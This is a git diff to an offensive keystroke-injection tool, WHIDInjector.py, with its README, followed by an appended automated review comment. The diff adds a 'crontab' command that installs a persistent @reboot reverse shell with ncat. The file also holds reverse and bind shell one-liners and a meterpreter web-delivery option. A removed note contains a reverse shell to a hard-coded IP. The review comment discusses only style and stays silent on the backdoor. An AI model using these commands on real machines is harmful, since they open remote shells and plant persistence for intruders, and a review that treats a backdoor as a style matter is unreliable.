diff --git a/README.md b/README.md
index 82e943d..36d79d9 100644
--- a/README.md
+++ b/README.md
@@ -69,11 +69,12 @@ Sending payload to http://192.168.1.1/runlivepayload
 | Commands | Description |
 | :------------- | :------------- |
 | bind | initiate a bind shell on results.port |
-| reverse | initiate a reverse shell on results.host and results.port|
+| reverse | initiate a reverse shell on results.host and results.port |
+| crontab | set up a crontab reverse shell on results.host and results.port |
 | meterpreter [https://YOUR_SERVER_IP:4646/posh-payload] | use exploit/multi/script/web_delivery with a posh-payload |
-| send some text | send the specified text |
-| h | help |
-| q | quit |
+| send some text | send the specified text |
+| h | help |
+| q | quit |
 
 You can change the options with `SET option_name option_value`
 ```c
diff --git a/WHIDInjector.py b/WHIDInjector.py
index f2f35b2..2d57028 100644
--- a/WHIDInjector.py
+++ b/WHIDInjector.py
@@ -77,6 +77,10 @@ if __name__ == "__main__":
         elif "reverse" == user_input :
             user_input = "bash -c 'nohup ncat %s %s -e $SHELL &'" % (results.host, results.port)
 
+        # Crontab Linux
+        elif "crontab" == user_input :
+            user_input = "bash -c '(crontab -l ; echo \"@reboot sleep 200 && ncat %s %s -e /bin/bash\")|crontab 2> /dev/null'" % (results.host, results.port)
+
         # Bind Shell Linux
         elif "bind" == user_input:
             user_input = "bash -c 'nohup ncat -lvp %s -e $SHELL -k &'" % (results.port)
@@ -138,13 +142,6 @@ if __name__ == "__main__":
     """
     export un binary with mapping FR: 2.7.51-ESP_Code.ino.french.bin
 
-empire bug
-refactor:
-
-crontab:
-(crontab -l ; echo "@reboot sleep 200 && ncat 92.222.81.2 4242 -e /bin/bash")|crontab 2> /dev/null
-
-
 TODO change_ssid_name
 TODO change_ssid_pass
 TODO update_firmware
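Review bot: The new `crontab` branch in WHIDInjector.py hard-codes the delay `sleep 200` with no explanation, while the sibling `reverse` branch just above uses `$SHELL` and this one uses `/bin/bash`; both differences deserve a comment or, for the delay, a named constant such as `CRONTAB_REBOOT_DELAY_SECONDS = 200` formatted into the string alongside `results.host` and `results.port`. The `2> /dev/null` also discards any error from the `crontab` invocation, so a failed install is indistinguishable from success at the console — worth a one-line comment stating that this is intentional, if it is. As a style point, `elif "crontab" == user_input :` carries a space before the colon that the `bind` branch does not; `elif "crontab" == user_input:` matches the surrounding code. The enclosing `if __name__ == "__main__":` block starts and ends outside the hunk.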